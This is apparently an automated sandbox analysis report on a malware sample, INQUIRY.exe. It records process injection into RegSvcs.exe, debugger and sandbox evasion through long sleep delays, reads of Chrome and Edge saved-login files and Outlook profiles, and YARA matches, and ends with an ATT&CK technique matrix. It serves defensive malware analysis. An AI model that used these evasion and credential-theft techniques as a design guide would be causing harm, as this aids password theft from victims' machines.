Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A7BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599671
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598796
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597921
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597593
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597373
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597265
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596281
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595953
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595843
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595624
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595515
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595406
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595296
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595186
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595077
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594966
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594640
Source: RegSvcs.exe, 00000003.00000002.4149809220.000000000119E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\INQUIRY.exe | API call chain: ExitProcess graph end node (graph_0-103667)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A83F09 BlockInput
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A13B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A45A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A14B37 LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_01DA34F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_01DA3490 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_01DA1E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 2_2_01013490 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 2_2_010134F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 2_2_01011E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A680A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A3A124 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A3A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004123F1 SetUnhandledExceptionFilter
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, UltraSpeed.cs | Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, FFDecryptor.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, FFDecryptor.cs | Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DAC008
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A687B1 LogonUserW
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A13B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A74C27 mouse_event
Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\INQUIRY.exe"
Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\INQUIRY.exe"
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A67CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A6874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: INQUIRY.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: INQUIRY.exe | Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A3862B cpuid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00417A20 GetLocaleInfoA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A44E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A51E06 GetUserNameW
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A43F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 3.2.RegSvcs.exe.3f86458.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.55a0000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.55a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.2d10bbe.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.3fae590.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.2d10bbe.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.3f85570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.55a0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.2d11aa6.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.5630000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.3f85570.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7348, type: MEMORYSTR
Source: Yara match | File source: 3.2.RegSvcs.exe.3f86458.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.55a0000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.55a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.2d10bbe.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.3fae590.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.2d10bbe.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.3f85570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.55a0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.2d11aa6.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.5630000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.3f85570.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.RegSvcs.exe.3f86458.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.55a0000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.55a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.2d10bbe.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.3fae590.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.2d10bbe.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.3f85570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.55a0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.2d11aa6.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.5630000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.3f85570.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7348, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: INQUIRY.exe | Binary or memory string: WIN_81
Source: INQUIRY.exe | Binary or memory string: WIN_XP
Source: INQUIRY.exe | Binary or memory string: WIN_XPe
Source: INQUIRY.exe | Binary or memory string: WIN_VISTA
Source: INQUIRY.exe | Binary or memory string: WIN_7
Source: INQUIRY.exe | Binary or memory string: WIN_8
Source: INQUIRY.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: Yara match | File source: 3.2.RegSvcs.exe.3f86458.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.55a0000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.55a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.2d10bbe.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.3fae590.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.2d10bbe.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.3f85570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.55a0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.2d11aa6.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.5630000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.3f85570.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7348, type: MEMORYSTR

              Remote Access Functionality

Source: C:\Users\user\Desktop\INQUIRY.exe, code function 0_2_00A86283: socket, WSAGetLastError, bind, listen, WSAGetLastError, closesocket
Source: C:\Users\user\Desktop\INQUIRY.exe, code function 0_2_00A86747: socket, WSAGetLastError, bind, WSAGetLastError, closesocket
ATT&CK matrix (rebuilt from the flattened grid, one line per tactic, techniques listed top to bottom; a leading number is the count badge the matrix attaches to techniques observed for this sample, unnumbered cells are the matrix's standard technique placeholders)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 12 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 212 Process Injection; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 11 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 2 Valid Accounts; 11 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 212 Process Injection; Dynamic API Resolution
Credential Access: 1 OS Credential Dumping; 121 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 2 System Time Discovery; 1 Account Discovery; 1 File and Directory Discovery; 137 System Information Discovery; 241 Security Software Discovery; 11 Virtualization/Sandbox Evasion; 2 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 11 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 121 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 1 Web Service; 2 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
